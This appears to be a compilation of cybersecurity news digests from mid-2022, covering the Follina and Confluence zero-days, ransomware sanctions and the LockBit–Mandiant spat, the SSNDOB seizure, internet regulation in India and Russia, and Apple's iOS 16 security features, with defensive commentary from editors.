- Poland’s phone spyware scandal raises doubts over 2019 election
- Catalan leaders targeted using NSO spyware, say cybersecurity experts
Inside ID.me’s torrid pandemic growth spurt: ill-equipped staff and data-security lapses
@caro1inehaskins back with a fresh inside look at ID.me, the digital identity verification company that caused a ruckus when it secured a deal with the IRS. The reporting shows a growth spurt during the pandemic that left the company unprepared to handle the massive influx of new business, which inevitably led to data security lapses. One former employee said: “It was disturbing to me that my background check wasn’t completed and that I was allowed to take home a computer with people’s information on it.” Yikes. And to think this company secured government contracts. ID.me also laid off employees this week after hiring nearly 1,500 new people during the pandemic.
Read more in
- $1.47 billion identity startup ID.me, which closed deals with unemployment agencies and the IRS, lays off staff after growth spurt
- Inside ID.me’s torrid pandemic growth spurt, which led to frantic hiring, ill-equipped staff, and data-security lapses as the company closed lucrative deals with unemployment agencies and the IRS
- Democrat senators call ID.me’s handling of user data ‘careless, irresponsible, and improper’ after Insider report
How a saxophonist tricked the KGB by encrypting secrets in music
A brilliant story about how U.S. saxophonist Merryl Goldberg devised an encryption scheme that used musical notation to allow her to smuggle information into and out of the former USSR, defying the watchful eyes of the then-KGB. Another great story that came out of RSA. @kennwhite with the stan tweets.
Read more in
How to open a locked Sentry Safe in seconds
A security researcher found a vulnerability that allows the opening of electronic safes from the Sentry Safe and Master Lock company without needing a PIN code. Great walkthrough, including a bonus sneaky method of delivery: a highlighter pen.
Read more in
New Tesla hack gives thieves their own personal key
An apparent flaw in Tesla’s NFC card — used as a way of unlocking an owner’s Tesla — has a bug that allows a would-be attacker 130 seconds to enroll a new key and effectively take over the car. “If a vehicle owner normally uses the phone app to unlock the car—by far the most common unlocking method for Teslas — the attacker can force the use of the NFC card by using a signal jammer to block the BLE frequency used by Tesla’s phone-as-a-key app.”
Read more in
OneTrust has ‘record’ quarters, still lays off 25% staff
Privacy unicorn OneTrust has been growing from strength to strength — if its statements are to be believed — with “record quarters and increasing customer demand,” reports Insider ($). But the Softbank-backed giant is cutting a quarter of its staff, some 950 employees, all the while splashing the cash at RSA. Cybereason also acknowledged layoffs despite a $3 billion valuation.
Read more in
- SoftBank-backed OneTrust laid off 25% of its staff 1 month after the privacy-management startup predicted ‘record quarters and increasing customer demand’
- Billion-Dollar Valuations Can’t Halt Layoffs at OneTrust, Cybereason
Feds shutter marketplace selling SSNs
SSNDOB, a series of websites that listed about 24 million Social Security numbers and other personal information, has been seized by U.S. and Cyprus authorities. The crime market netted some $19 million in sales over the past ten years — or more than $22 million in Bitcoin, per Chainalysis. SSNDOB has been active since at least 2013.
Read more in
- SSNDOB Shutdown: DOJ Announces Closure of Darknet Market Selling Social Security Numbers and Other Personally Identifiable Information
- Credit Reports Sold for Cheap in the Underweb
Microsoft mum on Follina exploit
Tech giant Microsoft is reportedly in “no hurry” to patch the Follina vulnerability under active attack, which exploits a bug in Office documents that crucially doesn’t require macros to work. Simply previewing a document will render a device compromised. The bug is already being exploited to infect devices with the Qbot malware and ransomware. But Microsoft has said very little since it declared the bug a vulnerability — at a 7.8 out of 10 rating — and hasn’t said anything about it since.
Read more in
- Now Windows Follina zero-day exploited to infect PCs with Qbot
- Follina — a Microsoft Office code execution vulnerability
US Government Agencies with Legacy Systems Face Struggle to Implement MFA
Eric Goldstein, CISA executive assistant director for cybersecurity told Cyberscoop that US government agencies with legacy systems may have difficulty implementing multi-factor authentication (MFA). Agencies were required to have implemented MFA by November 2021 as per a May 2021 executive order. The Biden administration is seeking $300 million for FY 2023 for the Technology Modernization Fund, which will be used to help agencies upgrade outdated IT systems.
- Implementing MFA usually implies implementing some form of SSO/IAM. Many organizations struggle not only with legacy systems, but also new SAAS offerings that only offer integration with standards like SAML for a substantial additional fee. 100% MFA is (sadly) not always realistic and you will have to consider other controls for systems that do not support MFA. For example, you could require access via a VPN that uses MFA. For SaaS platforms: Pay up or find an alternative.
- Over the years this has been the “the dog ate my homework” excuse for government agencies that are slow to make basic security hygiene improvements. History note: in 2001 a federal judge ordered the Bureau of Indian affairs to disconnect from the Internet because it could not protect Native American trust information. Some BIA offices were not allowed to reconnect until *2008*. We are at the point where failure to move away from reusable passwords on government networks (all networks, really) is a reason to say, “No Internet for you.”
- Many initiatives which expect MFA implementations assume applications are modernized to support current authentication mechanisms, such as SAML and a federated IDP, where enforcing MFA is a configuration task. Legacy applications are sometimes fitted with new entry points which themselves support MFA; in so doing, care must be taken to not leave a path to the old less secure entry point. In the past we have raised the bar by implementing solutions which leveraged the password field for their one-time authenticator and then augmenting the password validation process. Note that current directives require phishing-resistant MFA, which means this too may need updating. When replacing legacy systems, plan carefully, not only for acquisition and implementation but also business process re-engineering. Avoid the trap of modification of the new solution to implement old business models which can result in an increased mortgage and make future updates challenging if not impossible.
- Systems that are resistant to such a simple but powerful measure should be candidates for replacement rather than simply upgrade. While some argue that strong authentication is the most efficient security measure, it is unarguable that it is in the top three.
Read more in
Android Updates for June 2022
Google has released its Android updates for June 2022. Of the 41 vulnerabilities addressed in the updates, five are rated critical. There are updates available for Android 10, 11, and 12. Among the vulnerabilities addressed are a remote code execution flaw in Android Media Framework and a denial of service/remote code execution vulnerability in Unisoc chip firmware.
- Some Android phones (such as Google Pixel models) will get these updates fast, others (in the past most Samsung phones) will not. Spot check a few different makes of phones across your security team and warn users of those phones they are at risk.
- Note that the source code for the fixes is released to the ASOP repository 48 hours after the security bulletin is released, and your device manufacturers are notified a month before this is published. Which all means that attackers can now start reverse engineering the flaws and, more importantly, don’t wait on applying updates once published. If your OEM is not providing updates rapidly, you may want to assess the risk of their lagging behind and decide if another provider is appropriate.
Read more in
- Android Security Bulletin—June 2022
- Time to update: Google’s Android updates fixes 41 flaws, five critical
Facebook Phishing Campaign
A phishing campaign targeting Facebook and Messenger users has stolen millions of account credentials and tens of millions of dollars. The phishing campaign operates by sending a malicious link in DMs from compromised accounts. The link redirects recipients through a series of pages containing ads, ultimately landing on a phony Facebook login page. The campaign has been ongoing since late 2021.
- Facebook Direct Messenger is kinda like the Red Dye #2 of Internet communications – it really ought to be banned and replaced with something that at least has the same level of filtering that all email and SMS messaging gets these days. A warning about Facebook Messenger should be part of your security awareness outreach, as all too often security awareness videos that users have to watch will just talk generically – in many cases, warnings about using specific products and services are justified and needed.
- The attack includes about 400 unique Facebook phishing pages; analysis of 17 found an average of 985,228 visits. The attacker claims they net about $150 for every 1000 visits. Be careful with FB messenger: make sure that messages are really coming from your friends, particularly when one shows up from someone you’re not accustomed to using Messenger with. I suggest verifying their status through other mechanisms. The URLs shared are using common URL generators like litch.me, famouis.co, amaze.co and funnel-preview.com, which are also used by legitimate apps. That said, if you’re not used to getting links from these domains, don’t click them.
- A key here is when training your workforce on “phishing,” emphasize that phishing is no longer just email attacks, but SMS, voice phishing or on social media. Focus less on the medium that is used and more on the most common indicators of a social engineering attack; they are often the same, tremendous sense of urgency being one of the most common.
Read more in
- Facebook phishing campaign nets millions in IDs and cash
- Massive Facebook Messenger phishing operation generates millions
New Microsoft Defender Feature Isolates Unmanaged Devices
A new feature in Microsoft Defender for Endpoint (MDE) allows administrators to “contain” unmanaged (not enrolled in MDE) devices and devices suspected of being compromised. The feature is designed to prevent threat actors from moving laterally within organizations. MDE will tell enrolled devices to block all communication with devices tagged as “contained.” The “contain” feature works only on enrolled devices running Windows 10 or later or Windows Server 2019 or later.
- This is essentially good old-fashioned NAC (Network Access Control) which is really the foundation for any form of “Zero Trust.” (History note: Microsoft called it Network Access Protection and Cisco called it Network Admission Control back in the day.) NAC got a bad name 15 years ago due to interoperability issues across vendors and because it was mainly used to keep unpatched PCs from connecting – which punished the users for an IT ops failure to patch. Prioritize a testbed network segment to try it out – you will likely need to do some upskilling to deal with false positives, defining “contain” to balance security with disruption, and in threat hunting skills to investigate the devices being contained.
- Pay attention to how this works. If it fits your environment, you should definitely start piloting the capability. You can only use this capability on MDE devices, and the controls only work against other MDE devices. That said, this is an effective way of removing access to resources for devices which are compromised or otherwise don’t meet your acceptable level of risk. Also, containment is tied to machine identity rather than IP address, so access is blocked irrespective of connection location or IP.
Read more in
- Prevent compromised unmanaged devices from moving laterally in your organization with “Contain”
- Microsoft Defender now isolates hacked, unmanaged Windows devices
Sophos Says Dwell Time Increased in 2021
Sophos has published its Active Adversary Playbook 2022, which “details the main adversaries, tools, and attack behaviors seen in the wild during 2021 by Sophos’ frontline incident responders.” The report found that average dwell time for cyber intruders increased from 11 days in 2020 to 15 days in 2021. Healthcare organizations had on average the shortest dwell time (8.5 days), which educational institutions had the longest (34 days). Average well time was higher (more than 50 days) for companies with 250 or fewer employees than for larger organizations.
- Make sure your detection and response capabilities are where they need to be. Talk to your defenders to find where they have gaps, then take steps to address them. Make sure that you’re leveraging all the tools and automation available from your services. If you’re too small to insource your defense, talk to your service provider to make sure you have sufficient coverage. Lastly, schedule regular assessments and tests to verify you’re where you should be. Don’t forget to leverage resources from your local CISA, ISAC etc.
- While not a good statistic, it is better than in years past when average dwell time was measured in months, not weeks. However, the most recent DBIR report had a disturbing metric about dwell time: over 50% of breaches were self-reported by the cyber attacker. In other words, the victim found out about the breach from the attacker themselves (primarily ransomware).
Read more in
- The Active Adversary Playbook 2022
- Sophos uncovers latest cyber attack trends in Playbook report
- Hackers are now hiding inside networks for longer. That’s not a good sign
Follina is Being Actively Exploited to Spread Malware
Threat actors continue to exploit the Follina vulnerability in Windows (CVE-2022-30190) to spread malware. In addition to the phishing attacks targeting European and US government entities with Qbot malware, as noted by Proofpoint, Symantec has detected threat actors exploiting the vulnerability to spread AsyncRAT.
- Remember we were holding off on disabling MSDT? It’s time to re-assess. Your endpoint and other protection services are updating their protections. The attacks are coming from multiple well-resourced organizations. You need defense in depth.
Read more in
- ‘Follina’ Vulnerability Exploited to Deliver Qbot, AsyncRAT, Other Malware
- Now Windows Follina zero-day exploited to infect PCs with Qbot
- Symantec: More malware operators moving in to exploit Follina
- Attackers Exploit MSDT Follina Bug to Drop RAT, Infostealer
Joint Advisory: China Exploits Known Vulnerabilities to Target Telecoms
In a joint advisory, the US National Security Agency (NSA), the FBI, and the Cybersecurity and Infrastructure Security Agency (CISA) warn that Chinese “state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure.” The advisory lists 16 known vulnerabilities the hackers have been exploiting to infiltrate networking devices from 10 vendors.
- These are not new vulnerabilities. They range from 2017 to 2021, and most are in network equipment (firewalls, switches, access points, NAS.) It is paramount to make sure that your boundary protection and network devices are kept updated and secure, particularly as more segmentation and NAC solutions are implemented to support a more flexible service access model such as zero trust.
Read more in
- People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices
- Beijing-backed baddies target unpatched networking kit to attack telcos
- US warns Chinese hackers exploiting known vulnerabilities in espionage campaign on telecoms
- NSA, FBI warning: Hackers are using these flaws to target VPNs and network devices
- China-Sponsored Cyberattackers Target Networking Gear to Build Widespread Attack Infrastructure
- Fed cyber officials detail Chinese state hackers using common exploits against telcos
CISA’s Cyber Innovations Fellows Initiative
The US Cybersecurity and Infrastructure Security Agency’s (CISA’s) Cyber Innovations Fellows program will bring experts from the private sector to work at the agency part-time for up to four months. The fellows will bring “their expertise to some of our most critical teams.” CISA will hire the first group of up to eight fellows later this year.
- CISA has been working hard to raise the bar for both public and private sector cyber security. Even so, it has been noted that some of the CISA directives are not viable in the real world. This is an exciting opportunity to infuse real world experience and expertise into their processes as well as gain insight and understanding you can bring back. They are looking for a broad range of expertise including AI, ML, Cyber Risk, Remediation, Cloud, SBOM and Threat intel. If you’re interested read the CISA Prospective Cyber Fellow Candidates page for details: https://www.cisa.gov/prospective-cyber-fellow-candidates
Read more in
- Cyber Innovation Fellows Initiative
- Private-sector fellows to work with CISA on cloud security, threat intelligence
CISA Adds 39 Flaws to Known Exploited Vulnerabilities Catalog
This week, the US Cybersecurity and Infrastructure Security Agency (CISA) has added 39 flaws to its Known Exploited Vulnerabilities Catalog, 36 on Wednesday, June 8 and three more on Thursday, June 9. The flaws have mitigation due dates between June 22 and June 30.
- Note that there are multiple vulnerabilities which can be resolved with a single update, such as pushing the latest Chromium, Acrobat and Microsoft updates. Note there are some Flash Player issues listed. It is past time to remove Flash with extreme prejudice. CISA has also updated their guidance and FAQs associated with the KEV catalog: https://www.cisa.gov/uscert/ncas/current-activity/2022/06/07/cisa-provides-criteria-and-process-updates-kev-catalog
- This database is becoming quite large. It demonstrates how porous our environment is. Items in the catalog should get priority when patching.
Read more in
- CISA Adds 36 Known Exploited Vulnerabilities to Catalog
- CISA warning: Hackers are exploiting these 36 “significant” cybersecurity vulnerabilities – so patch now
- Known Exploited Vulnerabilities Catalog
Public exploit code worsens Atlassian Confluence vulnerability scenario
Threat actors continue to target unpatched versions of Atlassian Confluence with public exploits. The vulnerability, CVE-2022-26134, initially arrived as a zero-day last week that affects all versions of the popular collaboration tool. If exploited, the attacker could completely take over the host and execute remote code on the targeted machine. The vulnerability itself appears to be an OGNL injection vulnerability specifically impacting the web server and can be exploited via an HTTP request. It appears that all HTTP methods are vulnerable as well. The exploitation appears to be relatively straightforward and should be resolved immediately either through patching or other mitigations. Although a patch is publicly available, many instances of the software remain unpatched.
Read more in
- Threat Advisory: Atlassian Confluence zero-day vulnerability under active exploitation
- Attackers Use Public Exploits to Throttle Atlassian Confluence Flaw
ChinaChopper web shell pops up again on backs of Atlassian bugs
The ChinaChopper web shell is being spread as part of the attacks exploiting the zero-day vulnerability in Atlassian Confluence. Attackers exploiting CVE-2022-26134 install ChinaChopper but rarely access it, leading researchers to believe that it’s being used as a source of backup access. The nearly 11-year-old malware allows attackers to retain access to an infected system using a client-side application that contains all the logic required to control the target. Cisco Talos has documented several instances of different threat groups using China Chopper. This web shell is widely available, so almost any threat actor can use. This also means it’s nearly impossible to attribute attacks to a particular group using only presence of China Chopper as an indicator.
Read more in
- Exploitation of Atlassian Confluence zero-day surges fifteen-fold in 24 hours
- Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability
Evil Corp’s Sanctions Evasion Attempts Fall Flat
With sanctions against Evil Corp proving effective, it’s tempting to suggest ramping them up against the wider ransomware ecosystem. However, these sanctions are best used as a stick to punish the worst actors, not as a catch-all tool.
On Monday, the LockBit ransomware group claimed to have breached cybersecurity firm Mandiant on its leak site.
Rather than being a genuine breach, this looks to be retaliation for a Mandiant report released last week that linked Evil Corp to LockBit ransomware.
Evil Corp was originally sanctioned by the US Treasury department in 2019 for crimes including the development and distribution of Dridex banking malware. Since these sanctions were announced, Evil Corp has cycled through a succession of homegrown ransomware variants in increasingly quick succession. Mandiant believes that sanctions made it difficult for the group to extract ransom payments and as each new variant was associated publicly with Evil Corp the subsequent payment difficulties forced it to develop and migrate to a new variant.
Mandiant speculates that Evil Corp has since given up on its own strains and migrated to using ransomware from other Ransomware-as-a-Service operators to muddy attribution. Rather than being identifiable because it uses exclusive homegrown ransomware, it could blend in with other affiliates.
This makes total sense for Evil Corp, but it appears that LockBit doesn’t want to be tarred by the same sanction brush. It’s a reasonable concern for them. Victims will be reluctant to pay up when they’re hit by LockBit because the affiliate who actually deployed the malware might be on a sanctions list. The penalties for breaking Treasury sanctions can be stiff, up to USD$1m in fines and 20 years in prison per violation, so groups involved in payments (such as insurers and ransomware recovery and negotiation firms) aren’t keen to accidentally break any of them.
Mandiant claims LockBit’s fake hack was an attempt to discredit its report, but we think it’s more a case of juvenile payback and an attempt to distinguish itself from Evil Corp.
When LockBit published the cache of files it claimed it stole from Mandiant, the files included a statement from LockBit distancing itself from Evil Corp and its leader Maxim Yakubets which boils down to “our group has nothing to do with Evil Corp”.
One might look at Evil Corp using other RaaS as evidence that sanctions against ransomware actors are ineffective, but this incident proves the opposite. Sanctioned groups work hard to avoid them, and other criminal gangs don’t want anything to do with the sanctioned entities.
If that is not compelling enough, at this week’s RSA conference Rob Joyce, NSA’s Director of Cybersecurity, confirmed that ransomware operators had changed their behaviour due to sanctions. “How do we know? Really? We’re NSA… we’ve heard them say it is hard to get funds out,” he said.
So, if sanctions are effective, why not sanction all the groups? Surely this would drive down payments to the ransomware ecosystem?
For a start, there is a certain baseline amount of public information that is needed to effectively levee sanctions, as explored in a ProPublica article we linked to some weeks ago. It’s far better to list named individuals rather than meaningless groups that are constantly being rebranded, but it can be hard for the Treasury office responsible to point to reliable public information.
Additionally, victims are already more reluctant to pay Russian ransomware crews, as sanctions against Russian entities have expanded since the invasion of Ukraine. Even groups such as Conti — that aren’t specifically listed — could be sanctioned because of possible ties to listed entities such as the FSB. In other words, payments are already generally being throttled, so doing the work to specifically name more groups might not be worth it.
There may also simply be better things for Treasury to focus on. Reuters this week reports on cryptocurrency exchange Binance’s laundering of USD$2.35bn of funds over time. Why go for amorphous ransomware groups when exchanges are easier to target and may offer a far bigger payoff in terms of effects across the ecosystem? (Obviously blanket sanctions on the world’s largest cryptocurrency exchange are a non-starter, but there are levers to pull.)
And although sanctions look to be effective at reducing payments to ransomware groups, this is probably not the best measure of success. If it were, governments should simply make ransomware payments illegal. Job done! Ransomware solved!
Using sanctions as a behavioural lever to reduce the amount of disruption that ransomware causes looks to be a better approach: apply sanctions to the most damaging ransomware groups to encourage ransomware crews to behave “better”.
So we should enjoy the schadenfreude in this LockBit and Evil Corp incident, but let’s keep sanctions for the most damaging groups.
Internet Anonymity Targeted in Authoritarian States and Democracies Alike
Both authoritarian states and democracies are clamping down on internet freedoms and anonymity, each for entirely different reasons.
Let’s start with the authoritarian countries. Roskomnadzor, the Russian telecommunications watchdog, has ordered that the Tor browser be removed from the Russian Google Play store and also cracked down on use of VPNs. Together these appear to form part of a concerted effort to limit Russian citizen’s access to anonymising and censorship evasion technologies.
Other internet restrictions occur for reasons that are plain odd. The Record reported the Syrian government shuts down internet access to prevent cheating in high school national exams. And it is not alone in this — according to an Access Now report released in May this occurs in several other countries including Bangladesh, Iran, Iraq and India.
However, Access Now’s report found that most internet shutdowns occur in response to political instability and that India, a democracy, was the biggest culprit with 106 shutdowns. These occurred mostly in Jammu and Kashmir rather than being nation-wide, but they are still worrying as some observers are concerned that India may be “set on a path to becoming an illiberal pseudo-democracy”.
In addition to liberal use of internet shutdowns, the Indian government is also imposing stringent cyber security regulations intended to make the Indian internet more “open, safe, trusted and accountable”.
Some of the regulations seem too broad to be useful and will capture too much of the internet’s background noise. For example, companies have just six hours to report a range of common (or vaguely defined) incidents to India’s Computer Emergency Response Team (CERT-In), including:
- Targeted scanning/probing of critical networks/systems
- Identity Theft, spoofing, and phishing attacks
- Malicious mobile apps posing as legitimate apps
- Unauthorised access to social media accounts
- Attacks or malicious/suspicious activities affecting systems/ servers/networks/ software/ applications related to Big Data, Blockchain, virtual assets, virtual asset exchanges, custodian wallets, Robotics, 3D and 4D Printing, additive manufacturing, Drones
This updatehttps://www.cyberscoop.com/belarusian-hacktivist-group-releases-purported-belarusian-wiretapped-audio-of-russian-embassy/ recently lamented the US government’s lack of granular data on ransomware incidents and we are a fan of robust disclosure requirements — governments need to know what is happening on the internet to respond effectively. But this will just overwhelm CERT-In with the dull roar of the everyday internet.
These regulations also essentially spell the end of ‘no-log‘ VPN services, with VPN service providers (and also data centres and cloud service providers) being required to keep subscribers’ validated names, addresses, and IP address allocation information for five years. These kinds of VPNs are used for criminal activity, so there are good reasons the Indian government would want these logs kept.
As a result of these regulations, both ExpressVPN and Surfshark announced over the last week they have decided to remove their Indian VPN servers to avoid being subject to the regulation. Both are keeping Indian IP addresses in Singapore and the UK, so they say they will be able to serve customers wanting to appear to be in India. Other VPN services told The Record they might also remove their servers from India.
One concerning gap in the Indian regulations as they are published is that they don’t make clear what thresholds must be met for access to subscriber information. For example, the FAQ associated with the regulation states access to logs is at the discretion of CERT-In: “The requisition for seeking information is [sic] respect of logs may be given by an officer of CERT-In not below the rank of Deputy Secretary to the Government of India”.
Subsequent press reporting in The Economic Times makes it clear that this type of data would only be used by law enforcement agencies after they had followed standard procedures and obtained court orders, as happens in other democracies.
When push comes to shove, government authorities in democracies are often able to get IP addresses when they need to after following proper procedures. French authorities, for example, got the IP address of a French activist using ProtonMail’s services via Europol after approval from Swiss authorities, despite ProtonMail’s reputation and the “privacy cred” that comes with being Swiss-based.
What’s the lesson here? Governments of all stripes are no longer treating the internet as a regulation no-go zone, but different types of governments will make different decisions about where to draw the lines between privacy, anonymity, and security. Often these lines are drawn in the types of checks and balances found in democracies and less in the regulations themselves. As in: A metadata retention regime in Australia will result in different outcomes to the same sort of regulations applying in Myanmar.
iOS Safety Check
Apple announced iOS 16 will include Safety Check, a new feature to protect people in abusive relationships. It allows users to audit who else has access to passwords and other sensitive information such as location data and cut them off in one clean sweep.
PII market seized
The US government announced the seizure of the SSNDOB marketplace, an online marketplace that sold personally identifiable information (PII) of (mostly) US citizens, including social security numbers, dates of birth and names. It’s good to see international collaboration with both the Latvian and Cyprus police involved. Cryptocurrency analysis company Chainalysis reports SSNDOB has received USD$22m in Bitcoin since 2015, which probably understates the market’s importance as the PII it sold was used to enable fraud and other cyber crime.
Children’s hospital attack thwarted
At a cyber security conference FBI Director Christopher Wray said the organisation managed to prevent an attack by state-sponsored Iranian hackers on a Boston children’s hospital. It’s good it was stopped, but, like, wtf.
Schulte is Still Unpleasant
The New Yorker has a great long read about Joshua Schulte, the former CIA employee accused of leaking the agency’s hacking tools in the so-called Vault 7 document dump. The piece illustrates CIA office culture (more “Office Space” than “The Bourne Identity”) and what the author describes as “the pageantry of overclassification”. After the stolen and now publicly available materials were downloaded from WikiLeaks, for example, the investigators stored the laptop containing them in a safe and investigators needed security clearances before they were allowed to view the material.
Schulte also comes across as a real piece of work. In addition to stealing and leaking secrets, Schulte is charged with child pornography offences (he claims he’s innocent, and that child pornography is a non-violent victimless crime anyway). How he ever got a job at the CIA is a mystery.
Chinese APT “Plumbing” Laid Bare
The US government has released a joint Cyber security Advisory detailing the techniques Chinese state-sponsored groups use “to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure” including by targeting “major telecommunications companies and network providers”.
The advisory includes a section on how PRC groups typically operate in telco networks. After gaining initial access via known vulnerabilities they target critical authentication systems to get network credentials. These credentials are then used to harvest router configuration information and subsequently to “surreptitiously route, capture and exfiltrate traffic out of the network”.
Rob Joyce, the NSA’s Director of Cybersecurity, told The Record that this advisory pulled together information about the top vulnerabilities Chinese actors are using to build foundational “plumbing”. By publishing this information the US government hopes companies will be able to identify and “stop the tradecraft”.
Cyber Command Did Something. We Have No Idea What.
US Cyber Command Director Paul Nakasone stated that the US had launched offensive cyber operations against Russia in support of Ukraine. White House Press Secretary Karine Jean-Pierre then confirmed that these operations did not violate the US policy of avoiding a direct military conflict. An offensive operation could be anything from popping a shell on an enemy C2 server to blowing up a building by fiddling with its HVAC system, so without further context, Nakasone’s statement is essentially an information-free zone. But at least they get to sound like they’re doing something important.
Microsoft’s Digital Crimes Unit (DCU) said on Friday that they disrupted infrastructure operated by Bohrium, a cyber-espionage group operating out of Iran.
Amy Hogan-Burney, DCU General Manager, said the DCU legal team successfully obtained a court order that granted Microsoft control over 41 domains used by the Bohrium group in spear-phishing operations.
“Our DCU investigation found Bohrium targeted customers in the US, Middle East, and India. Targets come from sectors including tech, transportation, government, and education,” Hogan-Burney said.
The Microsoft exec said the group’s members used fake social media profiles, often posing as recruiters, and lured employees at targeted organisations on one of the 41 malicious sites. Here, they tried to collect their personal information, which they later used in subsequent email attacks that sought to infect the victims with malware.
To date, Microsoft’s DCU team has used the US court system to seize domains and server infrastructure from more than two-dozen cybercrime and espionage groups alike.
The Kinsing, Hezb, and Dark.IoT botnets have been spotted exploiting the recently-disclosed Confluence zero-day CVE-2022-26134 to install their payloads on unpatched servers.
Follina gets some love
After being disclosed last week, the Office zero-day vulnerability known as Follina (CVE-2022-30190) is seeing broader adoption by the cyber-criminal underground after being previously adopted by nation-state groups, Proofpoint’s threat intelligence team reported, with the latest to get on the exploitation train being the Qbot malware botnet.
LockBit-Mandiant drama, explained
Standing as evidence that most ransomware gangs have the emotional intelligence of a petty 12-year-old online gamer, the group behind the LockBit ransomware pulled off one of the most cringe-worthy stunts in recent years after, on Monday, the group published an entry on its “leak site” claiming to have breached and encrypted the network of cybersecurity giant Mandiant (formerly FireEye).
The announcement made a huge initial wave through the cybersecurity community, but it didn’t take long for industry experts to regain their wits and realize how unrealistic such an intrusion would be.
Obviously, Mandiant dismissed the claims as untrue; a task made immensely easier by the LockBit gang itself, which failed to share any evidence of their successful attack.
But the reality is that there was no such intrusion and one had to read between the lines to understand what really happened over the weekend.
All of the Monday drama is actually related to a report Mandiant published last week on EvilCorp, a major Russian cybercrime cartel that previously operated the Dridex banking trojan and ransomware strains such as Locky, Hades, WastedLocker, and BitPaymer.
One of the report’s findings was that after getting sanctioned by the US Treasury in December 2019, the EvilCorp group has been having a harder and harder time receiving ransom payments following their intrusions, as victims and ransomware negotiators would not want to break sanctions, fearing fines and possible prosecution from US authorities.
Over the past two and a half years, EvilCorp tried to avoid the looming sanctions by developing new ransomware strains and constantly rebranding their Ransomware-as-a-Service (RaaS) portals, often posing as a new cybercrime group that just launched on the criminal underground.
However, security researchers kept findings clues linking these new services to the old EvilCorp gang. As this tactic appears to have become inefficient in recent months, Mandiant said last week that EvilCorp members began using the RaaS services of other gangs, hoping to disguise their real identity as a mere sub-group of another ransomware cartel.
But just by publishing its report last week, Mandiant indirectly nuked the profitability of the LockBit RaaS into the ground, six feet under, dead and buried.
Just by casually linking the EvilCorp brand with LockBit’s operation, Mandiant has (accidentally?/intentionally?) ensured that victims and ransomware negotiators would now be just as skittish in making or approving payments following a LockBit attack, fearing the legal hammer of US authorities. This means that LockBit’s profits are about to take a ginormous hit over the next few weeks—and LockBit knows it!
Hence, that’s why we had all that kindergarten-level drama on Monday, which was nothing else but LockBit trying to ruin Mandiant’s reputation in return, but with little success and only managing to make themselves look like fools in the process.
And LockBit also knows that nobody believed their wild claims since a few hours later, on Monday, the group also published a statement that is the definition of “damage control,” a statement where they tried to distance themselves from EvilCorp and their leader, Maksim Yakubets, claiming no association. Alas, good luck getting paid, LockBit!
The IT infrastructure of the city of Palermo, Italy, has been down since last Friday following a cyber-attack.
DeFi platform Maiar said on Monday that a threat actor exploited a vulnerability on its platform and stole more than $113 million worth of cryptocurrency from its wallets. In a YouTube video published on Tuesday, the platform’s CEO said they had already recovered 95% of the stolen funds.
The New Yorker has a fantastic profile of Joshua Schulte, the former CIA agent behind the WikiLeaks Vault7 leak.
iOS gets separate security update mechanism
At the WWDC 2022 developer conference this week, Apple announced plans to add a new feature to iOS called Rapid Security Response that will allow the company to deploy security updates to its devices as separate patches without needing to update the entire operating system. The new feature will be added in iOS 16, scheduled to be released later this fall.
iOS to protect victims of domestic abuse
In addition, at the same WWDC 2022 conference, Apple also announced plans to add another feature in iOS 16 to protect people in or leaving abusive relationships. Called Safety Check, the new feature will help users manage app access and passwords and let them know who else has their passwords and personal information. But the best feature is something called an “emergency reset” that allows users to sign out of iCloud, lock down privacy settings and limit incoming messages to only “the device in their hand.”
In an investigative piece published on Monday, Reuters has accused the Binance cryptocurrency platform of being ignorant of money laundering operations taking place on its platform. Reuters reporters said that Binance served as a conduit for the laundering of at least $2.35 billion in illicit funds, including from drug traffickers, online fraudsters, and North Korean hackers.
XLoader pauses Ukraine infections
The operators of the XLoader malware said in a post on a cybercrime forum that they will no longer infect Ukrainian systems due to the ongoing war.
Arrest in Vietnam
Vietnamese officials have detained a Taiwanese national on accusations of breaching the country’s financial system. According to a statement published over the weekend, the suspect engaged in “scanning for security holes, privilege escalation attacks, [and] unauthorized access to the management system of servers at banks to withdraw money in customers’ accounts.”
Passwordstate digital certificate
The Passwordstate password management company, which suffered a major security breach last year, said they revoked their digital certificate after they were informed by an Australian security firm that it had been used to sign malware payloads last week. More specifically, the malicious payloads were Office files weaponized with the recently disclosed Follina zero-day.
Skimmer detained in Ukraine
In the midst of its war with Russia, Ukrainian Cyber Police have detained a Bulgarian national on accusations of installing skimmers on ATM devices across the country.
A new pro-Russian hacktivist group called “Киберспецназ” (CyberSpecial Forces) has been spotted active online, with the group vowing to attack NATO countries. The group becomes the 115th cyberspace threat actor known to be involved in the Ruso-Ukrainian conflict.
US and Cyprus officials have seized this week four web domains that hosted SSNDOB, a cybercrime marketplace known for selling access to detailed PII data. The website, which has been operating for a few years now, was listing the personal details of approximately 24 million Americans and made at least $19 million from its operation, the DOJ said on Tuesday.
Avast has released a decrypter for the TaRRaK ransomware, which has been infecting victims for almost a year since June 2021.
HP’s security team has published a report on SVCReady, a new malware loader strain delivered via malicious Office files. Researchers believe the malware may be linked to the TA551 threat actor.
Trellix has a summary of the cyber-attacks and cyber-espionage operations that have taken place since the onset of the Ruso-Ukrainian war and all the threat actors involved.
Micropatch for another Microsoft zero-day
ACROS Security has released a micropatch for another zero-day vulnerability in the Windows operating system. This new zero-day is named DogWalk, was re-discovered last week after first being documented in 2020, resides in the Microsoft Diagnostic Tool’s sdiageng.dll library, and can be used to bypass Mark-Of-The-Web (MOTW) markings.
Microsoft classified this bug as a “won’t fix” when it was initially reported to the company.
Telegram denies vulnerability report
Instant messaging service Telegram denied claims made by a user on Twitter that its platform contained a vulnerability that could be used to obtain private and group chats. In a message sent to Reuters reporter Raphael Satter, the company called the claims “fantastic at best” and that they had “all the hallmarks of a hoax.”
Android security patches
Google has released the Android Security Bulletin for June 2022.
IBM acquires Randori
IBM’s cybersecurity arm has acquired Randori, a provider of offensive cybersecurity and attack surface management (ASM) services.
Follina Vulnerability Remains Unpatched
Microsoft has not yet released a patch to address the vulnerability known as Follina. The flaw affects the company’s Support Diagnostic Tool and can be exploited to take control of vulnerable devices. Microsoft has acknowledged that the flaw is being actively exploited and has published guidance that include temporary mitigations. The vulnerability can be exploited through a maliciously-crafted Word document. The flaw affects all currently supported versions of Windows. Microsoft has not said whether or not plans to release a patch for the vulnerability.
